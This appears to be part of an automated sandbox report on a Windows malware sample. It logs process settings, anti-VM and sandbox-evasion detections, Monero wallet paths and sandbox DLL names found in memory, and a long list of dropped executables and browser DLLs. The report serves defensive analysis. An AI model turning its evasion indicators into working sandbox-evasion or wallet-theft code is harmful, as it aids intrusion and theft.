                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: 6.2.Yt_9y5LuIpBZXKd9EiYluKkG.exe.34c5570.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000006.00000002.2087266509.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe PID: 1876, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Yt_9y5LuIpBZXKd9EiYluKkG.exe PID: 1280, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XO9lsdL5g6aUibu31TDcoBrI.exe PID: 2228, type: MEMORYSTR
                        Checks if the current machine is a virtual machine (disk enumeration)
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                        Found API chain indicative of sandbox detection
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSandbox detection routine: GetCursorPos, DecisionNode, Sleepgraph_3-49040
                        Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_3-49042
                        Switches to a custom stack to bypass stack traces
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeAPI/Special instruction interceptor: Address: 7FF90818E814
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeAPI/Special instruction interceptor: Address: 7FF90818D584
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: Yt_9y5LuIpBZXKd9EiYluKkG.exe, 00000006.00000002.2087266509.00000000034F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL18:44:2018:44:2018:44:2018:44:2018:44:2018:44:20DELAYS.TMP%S%SNTDLL.DLL
                        Source: 5Hyf8PuolQS_j4ZkhvHWpkWr.exe, 00000009.00000002.2601793147.000000000282E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKC1Q
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory allocated: 1400000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeMemory allocated: 50B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeMemory allocated: 590000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeMemory allocated: 24C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeMemory allocated: 910000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeMemory allocated: BF0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeMemory allocated: 26F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeMemory allocated: 46F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeMemory allocated: 10E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeMemory allocated: 2F50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeMemory allocated: 2C00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeMemory allocated: 8F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeMemory allocated: 2340000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exeMemory allocated: 2260000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeMemory allocated: C40000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeMemory allocated: 4850000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeMemory allocated: 1A80000 memory reserve | memory write watch
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeMemory allocated: 3630000 memory reserve | memory write watch
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeMemory allocated: 3390000 memory reserve | memory write watch
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeMemory allocated: 1670000 memory reserve | memory write watch
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeMemory allocated: 31D0000 memory reserve | memory write watch
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeMemory allocated: 51D0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2F40000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 30D0000 memory reserve | memory write watch
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 50D0000 memory reserve | memory write watch
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeMemory allocated: 10E0000 memory reserve | memory write watch
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeMemory allocated: 2E90000 memory reserve | memory write watch
                        Source: C:\ProgramData\jewkkwnf\jewkkwnf.exeMemory allocated: 4E90000 memory reserve | memory write watch
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCursorPos,GetCursorPos,Sleep,GetCursorPos,__aulldiv,Sleep,3_2_00433130
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 300000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 300000Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\Yt_9y5LuIpBZXKd9EiYluKkG.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 466Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\userAEBAKJDGHI.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\unins000.exe (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dllJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exeJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeDropped PE file which has not been started: C:\ProgramData\jewkkwnf\jewkkwnf.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-5R4JI.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-QPPD9.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\uninstall\is-RB7TG.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9PSDC.tmp\_isetup\_setup64.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\msvcr71.dll (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\nikkovideocompressor32.exeJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\lgsfdam[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-I7KQ2.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\libeay32.dll (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9PSDC.tmp\_isetup\_shfoldr.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\Qt5OpenGL.dll (copy)Jump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeDropped PE file which has not been started: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exegmoZLMPgmA7iERod (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\is-213O2.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\ssleay32.dll (copy)Jump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MvOwPcqDrYVlvFIqJren.dllJump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exeDropped PE file which has not been started: C:\ProgramData\jewkkwnf\jewkkwnf.exe6Wob1mDxY9zsd70j (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\EGCBAFCFIJ.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\msvcp71.dll (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Nikko Video Compressor\libssl-1_1.dll (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-AABRP.tmp\VkcBn13x2kmdo9AMRXP8qT_4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9PSDC.tmp\_isetup\_iscrypt.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dllJump to dropped file
